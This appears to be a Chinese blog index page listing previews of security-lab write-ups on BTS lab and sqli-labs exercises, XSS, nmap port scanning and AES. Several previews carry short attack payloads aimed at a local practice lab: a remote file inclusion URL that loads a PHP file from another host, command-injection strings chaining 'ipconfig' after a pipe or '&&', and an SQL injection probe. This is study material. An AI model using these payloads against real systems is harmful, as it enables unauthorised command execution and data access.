自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+

wkend的博客

学习记录

原创 BTS测试实验室--远程文件包含和服务器端注入攻略

远程文件包含 构造payload:http://127.0.0.1/btslab/vulnerability/rfi/RFI.php?file=http://192.168.1.129/test2/demo1.php 可以看到,远程包含的文件被解析执行了。 下面来看看远程文件中的内容是什么? ...

2018-10-28 22:34:59

阅读数 186

评论数 0

原创 centos 7+nginx无法访问php页面的问题记录

在这里做一下问题记录帖: 问题截图: 这里我的配置环境是: centos 7.5 nginx 1.14.0 php 7.2.10 OK,下面说说解决办法: 找到php-fpm执行文件,我的在目录/usr/local/php/sbin/下 find / -name php-fpm 进入到该目录下...

2018-10-28 20:51:17

阅读数 1387

评论数 0

原创 BTS测试实验室 --- 注入关 --- PHP对象注入

0x01 挑战1 提到对象注入,首先就要了解对象的序列化与反序列化,所以对象注入漏洞也有人称作反序列化漏洞。有关序列化与反序列的内容,在这里做简单说明。 序列化的参数类型表示说明 String s:size:value Integer i:value Boolean b:value Null...

2018-10-28 15:20:24

阅读数 129

评论数 0

原创 BTS测试实验室 --- 注入关攻略

0x00 命令注入 payload: 127.0.0.1 | ipconfig 13||ipconfig 127.0.0.1&ipconfig 127.0.0.1&&ipconfig 上面的方式主要是通过管道符让系统执行了命令...

2018-10-28 10:05:59

阅读数 366

评论数 0

原创 BTS测试实验室 --- SQL注入关攻略

一. Sql注入1 判断注入点:http://127.0.0.1/btslab/vulnerability/ForumPosts.php?id=1’ 如下图,报错,存在sql注入 手工注入, (1)爆字段数: http://127.0.0.1/btslab/vulnerability/Forum...

2018-10-25 23:19:21

阅读数 283

评论数 0

原创 XSS小结

XSS是什么? XSS全称跨站脚本(Cross Site Scripting),为不和层叠样式表(Cascading Style Sheets, CSS)的缩写混淆,故缩写为XSS。跨站点脚本(XSS)攻击是一种注射型攻击,攻击者在可信的网页中嵌入恶意代码,用户访问可信网页时触发XSS而被攻击。 ...

2018-10-19 21:20:26

阅读数 1196

评论数 0

原创 sqli-labs练习(十八、十九、二十、二十一)

按照正常思路,先是对username和password输入框进行测试,并没有找到注入点,页面上显示的ip地址也很奇怪,最会无奈查看了源代码,才发现了突破口。 发现后台对uname和passwd有检查过滤函数check_input 于是跟进check_input函数,发现对输入的参数进行了长度限...

2018-10-14 00:05:39

阅读数 469

评论数 0

原创 端口扫描

0x01 端口扫描介绍 端口扫描是指人为发送一组端口扫描消息,视图以此了解某台计算机的弱点,并了解其提供的计算机网络服务类型。 端口最常用也是最强大的工具是nmap,在nmap的端口扫描方式中,所有的扫描方式都是以-s[x]的形式,若是ACK扫描则是-sA,若是UDP扫描则是-sU。 0x02 端...

2018-10-13 19:00:27

阅读数 612

评论数 0

原创 SQL 注入总结

0x01 什么是SQL注入 sql注入就是一种通过操作输入来修改后台操作语句达到执行恶意sql语句来进行攻击的技术。 0x02 SQL注入的分类 按变量类型分 数字型 字符型 按HTTP提交方式分 GET注入 POST注入 Cookie注入 按注入方式分 报错注入 盲注 布尔盲注...

2018-10-10 21:08:57

阅读数 2333

评论数 0

原创 AES内部加密原理

0x01 AES概述 高级加密标准(Advanced Encryption Standard,缩写:AES),在密码学中又称Rijndael加密法,是美国联邦政府采用的一种区块加密标准。这个标准用来替代原先的DES,已经被多方分析且广为全世界所使用。经过五年的甄选流程,高级加密标准由美国国家标准与...

2018-10-08 19:24:46

阅读数 317

评论数 0

提示
确定要删除当前文章?
取消 删除